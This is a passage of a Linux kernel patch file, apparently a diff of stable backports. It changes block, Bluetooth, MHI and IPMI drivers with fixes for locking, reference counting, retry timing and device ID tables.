+ 	int err = 0;
+ 
+-	if (op_is_write(op)) {
+-		err = copy_to_brd_setup(brd, sector, len);
++	if (op_is_write(opf)) {
++		/*
++		 * Must use NOIO because we don't want to recurse back into the
++		 * block or filesystem layers from page reclaim.
++		 */
++		gfp_t gfp = opf & REQ_NOWAIT ? GFP_NOWAIT : GFP_NOIO;
++
++		err = copy_to_brd_setup(brd, sector, len, gfp);
+ 		if (err)
+ 			goto out;
+ 	}
+ 
+ 	mem = kmap_atomic(page);
+-	if (!op_is_write(op)) {
++	if (!op_is_write(opf)) {
+ 		copy_from_brd(mem + off, brd, sector, len);
+ 		flush_dcache_page(page);
+ 	} else {
+@@ -298,8 +300,12 @@ static void brd_submit_bio(struct bio *bio)
+ 				(len & (SECTOR_SIZE - 1)));
+ 
+ 		err = brd_do_bvec(brd, bvec.bv_page, len, bvec.bv_offset,
+-				  bio_op(bio), sector);
++				  bio->bi_opf, sector);
+ 		if (err) {
++			if (err == -ENOMEM && bio->bi_opf & REQ_NOWAIT) {
++				bio_wouldblock_error(bio);
++				return;
++			}
+ 			bio_io_error(bio);
+ 			return;
+ 		}
+@@ -412,6 +418,7 @@ static int brd_alloc(int i)
+ 	/* Tell the block layer that this is not a rotational device */
+ 	blk_queue_flag_set(QUEUE_FLAG_NONROT, disk->queue);
+ 	blk_queue_flag_clear(QUEUE_FLAG_ADD_RANDOM, disk->queue);
++	blk_queue_flag_set(QUEUE_FLAG_NOWAIT, disk->queue);
+ 	err = add_disk(disk);
+ 	if (err)
+ 		goto out_cleanup_disk;
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 04453f4a319cb..60aed196a2e54 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -5292,8 +5292,7 @@ static void rbd_dev_release(struct device *dev)
+ 		module_put(THIS_MODULE);
+ }
+ 
+-static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+-					   struct rbd_spec *spec)
++static struct rbd_device *__rbd_dev_create(struct rbd_spec *spec)
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+@@ -5338,9 +5337,6 @@ static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+ 	rbd_dev->dev.parent = &rbd_root_dev;
+ 	device_initialize(&rbd_dev->dev);
+ 
+-	rbd_dev->rbd_client = rbdc;
+-	rbd_dev->spec = spec;
+-
+ 	return rbd_dev;
+ }
+ 
+@@ -5353,12 +5349,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+-	rbd_dev = __rbd_dev_create(rbdc, spec);
++	rbd_dev = __rbd_dev_create(spec);
+ 	if (!rbd_dev)
+ 		return NULL;
+ 
+-	rbd_dev->opts = opts;
+-
+ 	/* get an id and fill in device name */
+ 	rbd_dev->dev_id = ida_simple_get(&rbd_dev_id_ida, 0,
+ 					 minor_to_rbd_dev_id(1 << MINORBITS),
+@@ -5375,6 +5369,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ 	/* we have a ref from do_rbd_add() */
+ 	__module_get(THIS_MODULE);
+ 
++	rbd_dev->rbd_client = rbdc;
++	rbd_dev->spec = spec;
++	rbd_dev->opts = opts;
++
+ 	dout("%s rbd_dev %p dev_id %d\n", __func__, rbd_dev, rbd_dev->dev_id);
+ 	return rbd_dev;
+ 
+@@ -6736,7 +6734,7 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 		goto out_err;
+ 	}
+ 
+-	parent = __rbd_dev_create(rbd_dev->rbd_client, rbd_dev->parent_spec);
++	parent = __rbd_dev_create(rbd_dev->parent_spec);
+ 	if (!parent) {
+ 		ret = -ENOMEM;
+ 		goto out_err;
+@@ -6746,8 +6744,8 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 	 * Images related by parent/child relationships always share
+ 	 * rbd_client and spec/parent_spec, so bump their refcounts.
+ 	 */
+-	__rbd_get_client(rbd_dev->rbd_client);
+-	rbd_spec_get(rbd_dev->parent_spec);
++	parent->rbd_client = __rbd_get_client(rbd_dev->rbd_client);
++	parent->spec = rbd_spec_get(rbd_dev->parent_spec);
+ 
+ 	__set_bit(RBD_DEV_FLAG_READONLY, &parent->flags);
+ 
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 6368b56eacf11..4aec9be0ab77e 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -159,7 +159,7 @@ struct ublk_device {
+ 
+ 	struct completion	completion;
+ 	unsigned int		nr_queues_ready;
+-	atomic_t		nr_aborted_queues;
++	unsigned int		nr_privileged_daemon;
+ 
+ 	/*
+ 	 * Our ubq->daemon may be killed without any notification, so
+@@ -1179,6 +1179,9 @@ static void ublk_mark_io_ready(struct ublk_device *ub, struct ublk_queue *ubq)
+ 		ubq->ubq_daemon = current;
+ 		get_task_struct(ubq->ubq_daemon);
+ 		ub->nr_queues_ready++;
++
++		if (capable(CAP_SYS_ADMIN))
++			ub->nr_privileged_daemon++;
+ 	}
+ 	if (ub->nr_queues_ready == ub->dev_info.nr_hw_queues)
+ 		complete_all(&ub->completion);
+@@ -1203,6 +1206,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	u32 cmd_op = cmd->cmd_op;
+ 	unsigned tag = ub_cmd->tag;
+ 	int ret = -EINVAL;
++	struct request *req;
+ 
+ 	pr_devel("%s: received: cmd op %d queue %d tag %d result %d\n",
+ 			__func__, cmd->cmd_op, ub_cmd->q_id, tag,
+@@ -1253,8 +1257,8 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		 */
+ 		if (io->flags & UBLK_IO_FLAG_OWNED_BY_SRV)
+ 			goto out;
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		/* FETCH_RQ has to provide IO buffer if NEED GET DATA is not enabled */
++		if (!ub_cmd->addr && !ublk_need_get_data(ubq))
+ 			goto out;
+ 		io->cmd = cmd;
+ 		io->flags |= UBLK_IO_FLAG_ACTIVE;
+@@ -1263,8 +1267,12 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		ublk_mark_io_ready(ub, ubq);
+ 		break;
+ 	case UBLK_IO_COMMIT_AND_FETCH_REQ:
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		req = blk_mq_tag_to_rq(ub->tag_set.tags[ub_cmd->q_id], tag);
++		/*
++		 * COMMIT_AND_FETCH_REQ has to provide IO buffer if NEED GET DATA is
++		 * not enabled or it is Read IO.
++		 */
++		if (!ub_cmd->addr && (!ublk_need_get_data(ubq) || req_op(req) == REQ_OP_READ))
+ 			goto out;
+ 		if (!(io->flags & UBLK_IO_FLAG_OWNED_BY_SRV))
+ 			goto out;
+@@ -1535,6 +1543,10 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 	if (ret)
+ 		goto out_put_disk;
+ 
++	/* don't probe partitions if any one ubq daemon is un-trusted */
++	if (ub->nr_privileged_daemon != ub->nr_queues_ready)
++		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
++
+ 	get_device(&ub->cdev_dev);
+ 	ret = add_disk(disk);
+ 	if (ret) {
+@@ -1936,6 +1948,7 @@ static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
+ 	/* set to NULL, otherwise new ubq_daemon cannot mmap the io_cmd_buf */
+ 	ub->mm = NULL;
+ 	ub->nr_queues_ready = 0;
++	ub->nr_privileged_daemon = 0;
+ 	init_completion(&ub->completion);
+ 	ret = 0;
+  out_unlock:
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 2ad4efdd9e40b..18bc947187115 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -64,6 +64,7 @@ static struct usb_driver btusb_driver;
+ #define BTUSB_INTEL_BROKEN_SHUTDOWN_LED	BIT(24)
+ #define BTUSB_INTEL_BROKEN_INITIAL_NCMD BIT(25)
+ #define BTUSB_INTEL_NO_WBS_SUPPORT	BIT(26)
++#define BTUSB_ACTIONS_SEMI		BIT(27)
+ 
+ static const struct usb_device_id btusb_table[] = {
+ 	/* Generic Bluetooth USB device */
+@@ -492,6 +493,10 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x8087, 0xe0, 0x01, 0x01),
+ 	  .driver_info = BTUSB_IGNORE },
+ 
++	/* Realtek 8821CE Bluetooth devices */
++	{ USB_DEVICE(0x13d3, 0x3529), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++
+ 	/* Realtek 8822CE Bluetooth devices */
+ 	{ USB_DEVICE(0x0bda, 0xb00c), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+@@ -566,6 +571,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0e0), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0f2), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 	{ USB_DEVICE(0x04ca, 0x3802), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
+@@ -677,6 +685,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0cb5, 0xc547), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 
++	/* Actions Semiconductor ATS2851 based devices */
++	{ USB_DEVICE(0x10d7, 0xb012), .driver_info = BTUSB_ACTIONS_SEMI },
++
+ 	/* Silicon Wave based devices */
+ 	{ USB_DEVICE(0x0c10, 0x0000), .driver_info = BTUSB_SWAVE },
+ 
+@@ -4098,6 +4109,11 @@ static int btusb_probe(struct usb_interface *intf,
+ 		set_bit(BTUSB_USE_ALT3_FOR_WBS, &data->flags);
+ 	}
+ 
++	if (id->driver_info & BTUSB_ACTIONS_SEMI) {
++		/* Support is advertised, but not implemented */
++		set_bit(HCI_QUIRK_BROKEN_ERR_DATA_REPORTING, &hdev->quirks);
++	}
++
+ 	if (!reset)
+ 		set_bit(HCI_QUIRK_RESET_ON_CLOSE, &hdev->quirks);
+ 
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index bbe9cf1cae27f..d331772809d56 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1588,10 +1588,11 @@ static bool qca_wakeup(struct hci_dev *hdev)
+ 	struct hci_uart *hu = hci_get_drvdata(hdev);
+ 	bool wakeup;
+ 
+-	/* UART driver handles the interrupt from BT SoC.So we need to use
+-	 * device handle of UART driver to get the status of device may wakeup.
++	/* BT SoC attached through the serial bus is handled by the serdev driver.
++	 * So we need to use the device handle of the serdev driver to get the
++	 * status of device may wakeup.
+ 	 */
+-	wakeup = device_may_wakeup(hu->serdev->ctrl->dev.parent);
++	wakeup = device_may_wakeup(&hu->serdev->ctrl->dev);
+ 	bt_dev_dbg(hu->hdev, "wakeup status : %d", wakeup);
+ 
+ 	return wakeup;
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 1dc8a3557a464..9c42886818418 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -196,9 +196,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_mmio_disable_chdb(mhi_cntrl, ch_id);
+ 
+ 		/* Send channel disconnect status to client drivers */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to STOP */
+ 		mhi_chan->state = MHI_CH_STATE_STOP;
+@@ -228,9 +230,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_ring_reset(mhi_cntrl, ch_ring);
+ 
+ 		/* Send channel disconnect status to client driver */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to DISABLED */
+ 		mhi_chan->state = MHI_CH_STATE_DISABLED;
+@@ -719,24 +723,37 @@ static void mhi_ep_ch_ring_worker(struct work_struct *work)
+ 		list_del(&itr->node);
+ 		ring = itr->ring;
+ 
++		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
++		mutex_lock(&chan->lock);
++
++		/*
++		 * The ring could've stopped while we waited to grab the (chan->lock), so do
++		 * a sanity check before going further.
++		 */
++		if (!ring->started) {
++			mutex_unlock(&chan->lock);
++			kfree(itr);
++			continue;
++		}
++
+ 		/* Update the write offset for the ring */
+ 		ret = mhi_ep_update_wr_offset(ring);
+ 		if (ret) {
+ 			dev_err(dev, "Error updating write offset for ring\n");
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		/* Sanity check to make sure there are elements in the ring */
+ 		if (ring->rd_offset == ring->wr_offset) {
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		el = &ring->ring_cache[ring->rd_offset];
+-		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
+ 
+-		mutex_lock(&chan->lock);
+ 		dev_dbg(dev, "Processing the ring for channel (%u)\n", ring->ch_id);
+ 		ret = mhi_ep_process_ch_ring(ring, el);
+ 		if (ret) {
+@@ -1119,6 +1136,7 @@ void mhi_ep_suspend_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Suspending channel\n");
+ 		/* Set channel state to SUSPENDED */
++		mhi_chan->state = MHI_CH_STATE_SUSPENDED;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_SUSPENDED);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
+@@ -1148,6 +1166,7 @@ void mhi_ep_resume_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Resuming channel\n");
+ 		/* Set channel state to RUNNING */
++		mhi_chan->state = MHI_CH_STATE_RUNNING;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_RUNNING);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
+diff --git a/drivers/char/applicom.c b/drivers/char/applicom.c
+index 36203d3fa6ea6..69314532f38cd 100644
+--- a/drivers/char/applicom.c
++++ b/drivers/char/applicom.c
+@@ -197,8 +197,10 @@ static int __init applicom_init(void)
+ 		if (!pci_match_id(applicom_pci_tbl, dev))
+ 			continue;
+ 		
+-		if (pci_enable_device(dev))
++		if (pci_enable_device(dev)) {
++			pci_dev_put(dev);
+ 			return -EIO;
++		}
+ 
+ 		RamIO = ioremap(pci_resource_start(dev, 0), LEN_RAM_IO);
+ 
+@@ -207,6 +209,7 @@ static int __init applicom_init(void)
+ 				"space at 0x%llx\n",
+ 				(unsigned long long)pci_resource_start(dev, 0));
+ 			pci_disable_device(dev);
++			pci_dev_put(dev);
+ 			return -EIO;
+ 		}
+ 
+diff --git a/drivers/char/ipmi/ipmi_ipmb.c b/drivers/char/ipmi/ipmi_ipmb.c
+index 7c1aee5e11b77..3f1c9f1573e78 100644
+--- a/drivers/char/ipmi/ipmi_ipmb.c
++++ b/drivers/char/ipmi/ipmi_ipmb.c
+@@ -27,7 +27,7 @@ MODULE_PARM_DESC(bmcaddr, "Address to use for BMC.");
+ 
+ static unsigned int retry_time_ms = 250;
+ module_param(retry_time_ms, uint, 0644);
+-MODULE_PARM_DESC(max_retries, "Timeout time between retries, in milliseconds.");
++MODULE_PARM_DESC(retry_time_ms, "Timeout time between retries, in milliseconds.");
+ 
+ static unsigned int max_retries = 1;
+ module_param(max_retries, uint, 0644);
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index 4bfd1e3066162..f49d2c2ef3cfd 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -74,7 +74,8 @@
+ /*
+  * Timer values
+  */
+-#define SSIF_MSG_USEC		60000	/* 60ms between message tries. */
++#define SSIF_MSG_USEC		60000	/* 60ms between message tries (T3). */
++#define SSIF_REQ_RETRY_USEC	60000	/* 60ms between send retries (T6). */
+ #define SSIF_MSG_PART_USEC	5000	/* 5ms for a message part */
+ 
+ /* How many times to we retry sending/receiving the message. */
+@@ -82,7 +83,9 @@
+ #define	SSIF_RECV_RETRIES	250
+ 
+ #define SSIF_MSG_MSEC		(SSIF_MSG_USEC / 1000)
++#define SSIF_REQ_RETRY_MSEC	(SSIF_REQ_RETRY_USEC / 1000)
+ #define SSIF_MSG_JIFFIES	((SSIF_MSG_USEC * 1000) / TICK_NSEC)
++#define SSIF_REQ_RETRY_JIFFIES	((SSIF_REQ_RETRY_USEC * 1000) / TICK_NSEC)
+ #define SSIF_MSG_PART_JIFFIES	((SSIF_MSG_PART_USEC * 1000) / TICK_NSEC)
+ 
+ /*
+@@ -92,7 +95,7 @@
+ #define SSIF_WATCH_WATCHDOG_TIMEOUT	msecs_to_jiffies(250)
+ 
+ enum ssif_intf_state {
+-	SSIF_NORMAL,
++	SSIF_IDLE,
+ 	SSIF_GETTING_FLAGS,
+ 	SSIF_GETTING_EVENTS,
+ 	SSIF_CLEARING_FLAGS,
+@@ -100,8 +103,8 @@ enum ssif_intf_state {
+ 	/* FIXME - add watchdog stuff. */
+ };
+ 
+-#define SSIF_IDLE(ssif)	 ((ssif)->ssif_state == SSIF_NORMAL \
+-			  && (ssif)->curr_msg == NULL)
++#define IS_SSIF_IDLE(ssif) ((ssif)->ssif_state == SSIF_IDLE \
++			    && (ssif)->curr_msg == NULL)
+ 
+ /*
+  * Indexes into stats[] in ssif_info below.
+@@ -229,6 +232,9 @@ struct ssif_info {
+ 	bool		    got_alert;
+ 	bool		    waiting_alert;
+ 
++	/* Used to inform the timeout that it should do a resend. */
++	bool		    do_resend;
++
+ 	/*
+ 	 * If set to true, this will request events the next time the
+ 	 * state machine is idle.
+@@ -348,9 +354,9 @@ static void return_hosed_msg(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -367,7 +373,7 @@ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	if (start_send(ssif_info, msg, 3) != 0) {
+ 		/* Error, just go to normal state. */
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 	}
+ }
+ 
+@@ -382,7 +388,7 @@ static void start_flag_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 	mb[0] = (IPMI_NETFN_APP_REQUEST << 2);
+ 	mb[1] = IPMI_GET_MSG_FLAGS_CMD;
+ 	if (start_send(ssif_info, mb, 2) != 0)
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ }
+ 
+ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+@@ -393,7 +399,7 @@ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+ 
+ 		flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+ 		ssif_info->curr_msg = NULL;
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		ipmi_free_smi_msg(msg);
+ 	}
+@@ -407,7 +413,7 @@ static void start_event_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -430,7 +436,7 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -448,9 +454,9 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -466,7 +472,7 @@ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 		/* Events available. */
+ 		start_event_fetch(ssif_info, flags);
+ 	else {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 	}
+ }
+@@ -538,22 +544,28 @@ static void start_get(struct ssif_info *ssif_info)
+ 		  ssif_info->recv, I2C_SMBUS_BLOCK_DATA);
+ }
+ 
++static void start_resend(struct ssif_info *ssif_info);
++
+ static void retry_timeout(struct timer_list *t)
+ {
+ 	struct ssif_info *ssif_info = from_timer(ssif_info, t, retry_timer);
+ 	unsigned long oflags, *flags;
+-	bool waiting;
++	bool waiting, resend;
+ 
+ 	if (ssif_info->stopping)
+ 		return;
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
++	resend = ssif_info->do_resend;
++	ssif_info->do_resend = false;
+ 	waiting = ssif_info->waiting_alert;
+ 	ssif_info->waiting_alert = false;
+ 	ipmi_ssif_unlock_cond(ssif_info, flags);
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
++	if (resend)
++		start_resend(ssif_info);
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -568,7 +580,7 @@ static void watch_timeout(struct timer_list *t)
+ 	if (ssif_info->watch_timeout) {
+ 		mod_timer(&ssif_info->watch_timer,
+ 			  jiffies + ssif_info->watch_timeout);
+-		if (SSIF_IDLE(ssif_info)) {
++		if (IS_SSIF_IDLE(ssif_info)) {
+ 			start_flag_fetch(ssif_info, flags); /* Releases lock */
+ 			return;
+ 		}
+@@ -602,8 +614,6 @@ static void ssif_alert(struct i2c_client *client, enum i2c_alert_protocol type,
+ 		start_get(ssif_info);
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info);
+-
+ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			     unsigned char *data, unsigned int len)
+ {
+@@ -756,7 +766,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	switch (ssif_info->ssif_state) {
+-	case SSIF_NORMAL:
++	case SSIF_IDLE:
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		if (!msg)
+ 			break;
+@@ -774,7 +784,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			 * Error fetching flags, or invalid length,
+ 			 * just give up for now.
+ 			 */
+-			ssif_info->ssif_state = SSIF_NORMAL;
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Error getting flags: %d %d, %x\n",
+@@ -809,7 +819,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 				 "Invalid response clearing flags: %x %x\n",
+ 				 data[0], data[1]);
+ 		}
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		break;
+ 
+@@ -887,7 +897,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+-	if (SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
++	if (IS_SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
+ 		if (ssif_info->req_events)
+ 			start_event_fetch(ssif_info, flags);
+ 		else if (ssif_info->req_flags)
+@@ -909,31 +919,23 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	if (result < 0) {
+ 		ssif_info->retries_left--;
+ 		if (ssif_info->retries_left > 0) {
+-			if (!start_resend(ssif_info)) {
+-				ssif_inc_stat(ssif_info, send_retries);
+-				return;
+-			}
+-			/* request failed, just return the error. */
+-			ssif_inc_stat(ssif_info, send_errors);
+-
+-			if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+-				dev_dbg(&ssif_info->client->dev,
+-					"%s: Out of retries\n", __func__);
+-			msg_done_handler(ssif_info, -EIO, NULL, 0);
++			/*
++			 * Wait the retry timeout time per the spec,
++			 * then redo the send.
++			 */
++			ssif_info->do_resend = true;
++			mod_timer(&ssif_info->retry_timer,
++				  jiffies + SSIF_REQ_RETRY_JIFFIES);
+ 			return;
+ 		}
+ 
+ 		ssif_inc_stat(ssif_info, send_errors);
+ 
+-		/*
+-		 * Got an error on transmit, let the done routine
+-		 * handle it.
+-		 */
+ 		if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+ 			dev_dbg(&ssif_info->client->dev,
+-				"%s: Error  %d\n", __func__, result);
++				"%s: Out of retries\n", __func__);
+ 
+-		msg_done_handler(ssif_info, result, NULL, 0);
++		msg_done_handler(ssif_info, -EIO, NULL, 0);
+ 		return;
+ 	}
+ 
+@@ -996,7 +998,7 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info)
++static void start_resend(struct ssif_info *ssif_info)
+ {
+ 	int command;
+ 
+@@ -1021,7 +1023,6 @@ static int start_resend(struct ssif_info *ssif_info)
+ 
+ 	ssif_i2c_send(ssif_info, msg_written_handler, I2C_SMBUS_WRITE,
+ 		   command, ssif_info->data, I2C_SMBUS_BLOCK_DATA);
+-	return 0;
+ }
+ 
+ static int start_send(struct ssif_info *ssif_info,
+@@ -1036,7 +1037,8 @@ static int start_send(struct ssif_info *ssif_info,
+ 	ssif_info->retries_left = SSIF_SEND_RETRIES;
+ 	memcpy(ssif_info->data + 1, data, len);
+ 	ssif_info->data_len = len;
+-	return start_resend(ssif_info);
++	start_resend(ssif_info);
++	return 0;
+ }
+ 
+ /* Must be called with the message lock held. */
+@@ -1046,7 +1048,7 @@ static void start_next_msg(struct ssif_info *ssif_info, unsigned long *flags)
+ 	unsigned long oflags;
+ 
+  restart:
+-	if (!SSIF_IDLE(ssif_info)) {
++	if (!IS_SSIF_IDLE(ssif_info)) {
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -1269,7 +1271,7 @@ static void shutdown_ssif(void *send_info)
+ 	dev_set_drvdata(&ssif_info->client->dev, NULL);
+ 
+ 	/* make sure the driver is not looking for flags any more. */
+-	while (ssif_info->ssif_state != SSIF_NORMAL)
++	while (ssif_info->ssif_state != SSIF_IDLE)
+ 		schedule_timeout(1);
+ 
+ 	ssif_info->stopping = true;
+@@ -1334,8 +1336,10 @@ static int do_cmd(struct i2c_client *client, int len, unsigned char *msg,
+ 	ret = i2c_smbus_write_block_data(client, SSIF_IPMI_REQUEST, len, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry1;
++		}
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1476,8 +1480,10 @@ retry_write:
+ 					 32, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry_write;
++		}
+ 		dev_err(&client->dev, "Could not write multi-part start, though the BMC said it could handle it.  Just limit sends to one part.\n");
+ 		return ret;
+ 	}
+@@ -1839,7 +1845,7 @@ static int ssif_probe(struct i2c_client *client)
+ 	}
+ 
+ 	spin_lock_init(&ssif_info->lock);
+-	ssif_info->ssif_state = SSIF_NORMAL;
++	ssif_info->ssif_state = SSIF_IDLE;
